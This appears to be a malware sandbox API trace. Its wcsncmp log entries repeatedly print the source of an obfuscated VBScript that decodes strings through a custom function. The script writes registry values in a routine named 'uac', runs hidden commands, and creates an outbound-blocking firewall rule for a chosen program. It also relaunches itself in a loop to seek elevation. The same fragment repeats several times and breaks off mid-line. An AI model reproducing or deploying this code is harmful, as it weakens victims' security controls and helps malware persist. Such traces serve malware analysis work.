bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 61 [0226.364] wcsncmp (_String1="DPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.364] wcsncmp (_String1="PENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.364] wcsncmp (_String1="ENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.364] wcsncmp (_String1="NFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.364] wcsncmp (_String1="FDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 